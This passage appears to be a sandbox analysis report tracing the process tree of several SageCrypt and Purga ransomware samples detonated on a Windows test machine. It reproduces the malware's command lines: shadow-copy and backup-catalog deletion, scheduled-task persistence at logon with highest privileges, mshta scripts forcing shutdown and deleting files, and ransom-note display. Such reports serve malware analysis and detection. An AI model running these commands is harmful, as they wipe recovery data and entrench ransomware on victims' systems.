C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start /max notepad.exe "C:\Users\Admin\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT"5⤵PID:4932
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "javascript:o=new ActiveXObject('WScript.Shell');setInterval(function(){try{o.Run('cmd.exe /c for %o in (\x22-s -f -t 0\x22;\x22/s /f /t 0\x22) do shutdown %~o',0);close()}catch(e){}},5000);"5⤵PID:4256
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('database.exe');close()}catch(e){}},10);"5⤵PID:8120
-
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('Trojan-Ransom.Win32.Purga.bk-89258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036.exe');close()}catch(e){}},10);"4⤵PID:3856
-
-
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exeTrojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:2544 -
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g3⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Suspicious use of AdjustPrivilegeToken
PID:664
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /TN "N0mFUQoa" /TR "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" /SC ONLOGON /RL HIGHEST /F3⤵
- Scheduled Task/Job: Scheduled Task
PID:5680
-
-
C:\Windows\SysWOW64\vssadmin.exe"C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3192
-
-
C:\Windows\SysWOW64\vssadmin.exe"C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet3⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:5156
-
-
C:\Windows\SysWOW64\vssadmin.exe"C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:6340
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\!HELP_SOS.hta"3⤵
- Modifies Internet Explorer settings
PID:6168
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f1.vbs"3⤵PID:3456
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g3⤵PID:6020
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g3⤵PID:7808
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g3⤵PID:3460
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g3⤵PID:3380
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g3⤵PID:5348
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g3⤵PID:4892
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g3⤵PID:7832
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g3⤵PID:7868
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g3⤵PID:7892
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g3⤵PID:7908
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g3⤵PID:6760
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g3⤵PID:7848
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g3⤵PID:7968
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g3⤵PID:7940
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g3⤵PID:5892
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g3⤵PID:7960
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g3⤵PID:7900
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g3⤵PID:8000
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g3⤵PID:2448
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g3⤵PID:7044
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g3⤵PID:8028
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g3⤵PID:7252
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g3⤵PID:8044
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g3⤵PID:8084
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g3⤵PID:8056
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g3⤵PID:7972
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g3⤵PID:8092
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g3⤵PID:8100
-
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exeTrojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2220 -
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe" g3⤵
- Executes dropped EXE
PID:1992 -
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe" g4⤵
- Executes dropped EXE
PID:5960 -
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe" g5⤵
- Executes dropped EXE
PID:1660 -
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe" g6⤵
- Executes dropped EXE
PID:4144 -
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe" g7⤵
- Executes dropped EXE
PID:5784 -
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe" g8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1508 -
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe" g9⤵
- Executes dropped EXE
PID:4932 -
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe" g10⤵PID:4680
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dqq-cbdacafba9218a687bd0c8d3d92353b3bdea82cf1fe205c9637ac84dc03405d2.exeTrojan-Ransom.Win32.SageCrypt.dqq-cbdacafba9218a687bd0c8d3d92353b3bdea82cf1fe205c9637ac84dc03405d2.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1740 -
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dqq-cbdacafba9218a687bd0c8d3d92353b3bdea82cf1fe205c9637ac84dc03405d2.exeTrojan-Ransom.Win32.SageCrypt.dqq-cbdacafba9218a687bd0c8d3d92353b3bdea82cf1fe205c9637ac84dc03405d2.exe3⤵
- Drops startup file
- Executes dropped EXE
PID:2132 -
C:\Windows\SysWOW64\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" process call create "cmd.exe /c vssadmin.exe delete shadows /quiet /all"4⤵
- System Location Discovery: System Language Discovery
PID:3392
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\README_sTlLoTpq.hta"4⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
PID:3880
-
-
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exeTrojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: MapViewOfSection
PID:2548 -
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe" g3⤵
- Executes dropped EXE
PID:3768
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /TN "FsJjs3Fo" /TR "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe" /SC ONLOGON /RL HIGHEST /F3⤵
- Scheduled Task/Job: Scheduled Task
PID:1656
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"3⤵
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: MapViewOfSection
PID:3388 -
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:5704
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin.exe delete shadows /all /quiet4⤵PID:4856
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet5⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:3788
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete4⤵PID:4744
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete5⤵PID:5396
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet4⤵PID:4740
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin.exe delete shadows /all /quiet4⤵PID:6028
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet5⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:5892
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete4⤵PID:5932
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete5⤵PID:3972
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet4⤵PID:4640
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\System32\cmd.exe" /C vssadmin.exe delete shadows /all /quiet4⤵
- Suspicious use of SetWindowsHookEx
PID:3396
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete4⤵
- Suspicious use of SetWindowsHookEx
PID:4604
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet4⤵
- Suspicious use of SetWindowsHookEx
PID:6268
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\!HELP_SOS.hta"4⤵
- Modifies Internet Explorer settings
PID:5312
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f1.vbs"4⤵PID:6500
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /DELETE /TN /F "FsJjs3Fo"4⤵PID:3660
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f31199139.vbs"4⤵PID:4460
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\System32\cmd.exe" /C vssadmin.exe delete shadows /all /quiet4⤵PID:4856
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete4⤵PID:5200
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet4⤵PID:6576
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:7360
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:7388
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:7412
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:7344
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:7420
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:2356
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:7348
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:7416
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:2644
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:7092
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:5100
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:7456
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:7460
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:2140
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:6820
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:7220
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:7488
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:4696
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:2484
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:7432
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:7572
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:7512
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:7552
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:7560
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:4700
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:3496
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:4268
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:3308
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:7576
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:7588
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:3724
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:4348
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:5660
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:3660
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:6612
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:7528
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:8032
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:7504
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:2952
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:6584
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:5616
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:216
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:2604
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:5096
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:5724
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:896
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:2740
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:5024
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:6476
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:5604
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:2268
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:7640
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:6376
-
-
C:\Windows\syswow64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:2916
-
-
